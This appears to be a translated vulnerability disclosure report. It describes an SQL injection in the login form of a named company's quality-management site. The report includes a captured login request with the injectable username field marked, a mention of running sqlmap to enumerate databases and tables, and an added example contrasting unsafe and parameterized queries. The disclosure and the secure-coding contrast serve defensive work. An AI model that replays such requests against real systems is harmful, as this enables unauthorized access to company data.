2015-10-07: Details reported to the vendor, awaiting vendor handling
2015-10-07: Vendor confirmed; details disclosed to the vendor only
2015-10-17: Details disclosed to core white hats and relevant domain experts
2015-10-27: Details disclosed to regular white hats
2015-11-06: Details disclosed to intern white hats
2015-11-21: Details disclosed to the public
SQL Injection Vulnerability
At first glance the login form at http://qms.midea.com.cn/ showed nothing interesting, and I did not want to brute-force it.
But I found that the link http://qms.midea.com.cn/CE/default.aspx is the same system as the one above.
Clearly the backend database is Oracle. Capturing the login request:
POST /CE/default.aspx HTTP/1.1
Host: qms.midea.com.cn
Proxy-Connection: keep-alive
Content-Length: 250
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://qms.midea.com.cn
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://qms.midea.com.cn/CE/default.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2
Cookie: ASP.NET_SessionId=uc5ues45xgqzgq2zjqk045vm

__VIEWSTATE=%2FwEPDwULLTEyODkwNjgzOTMPZBYCAgMPZBYCAgsPDxYCHgRUZXh0BSfor6XnlKjmiLfkuI3lrZjlnKjmiJbogIXlr4bnoIHplJnor6%2FvvIFkZGTudlv6iFY8jWXoEVrL4hLt%2FZp3Jg%3D%3D&DDL_ZZ=2149&TextBoxUserName=admin*&TextBoxPassword=admin&ButtonLogin=%E7%99%BB+%E5%BD%95
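The code-level pattern behind this finding, as an added example that is not from the report or from the vendor's application: a login lookup with the form value concatenated into the SQL text, beside the parameterized form. It uses an in-memory sqlite3 database as a stand-in for the Oracle backend and assumes a users table with username/password columns, neither of which is shown on the page.

```python
import sqlite3

# Constructed stand-in for the Oracle-backed login table. The real QMS schema is
# not on the page; the table name and its columns are assumptions for this example.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse')")
    conn.commit()
    return conn

def login_unsafe(conn, username, password):
    """The injectable pattern: a form field such as TextBoxUserName is pasted
    straight into the query text, so a quote in the input changes the SQL."""
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    try:
        return [row[0] for row in conn.execute(sql)]
    except sqlite3.Error as exc:
        # A database error surfaced to the client is what reveals the backend
        # type (here: Oracle) and is the first signal sqlmap keys on.
        return ["ERROR: " + str(exc)]

def login_safe(conn, username, password):
    """Hardened form: bind variables, so the driver never parses the input as SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]

if __name__ == "__main__":
    db = make_db()
    print(login_unsafe(db, "admin'", "x"))  # query breaks; the error text leaks out
    print(login_safe(db, "admin'", "x"))    # [] : the quote is treated as plain data
```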
Run sqlmap directly against it:
All database names:
Current database name:
List all tables in the current database:
Database: QMSCEADMIN [248 tables]
Proof of the vulnerability is enough; I did not go any deeper.
Severity: Medium
Vulnerability Rank: 8
Confirmed at: 2015-10-07 19:32
Thanks to WooYun's most formidable white hat @路人甲 for the heads-up; we have summoned the application administrator to fix it. By the way, 路人甲, what is the use of having such a high RANK...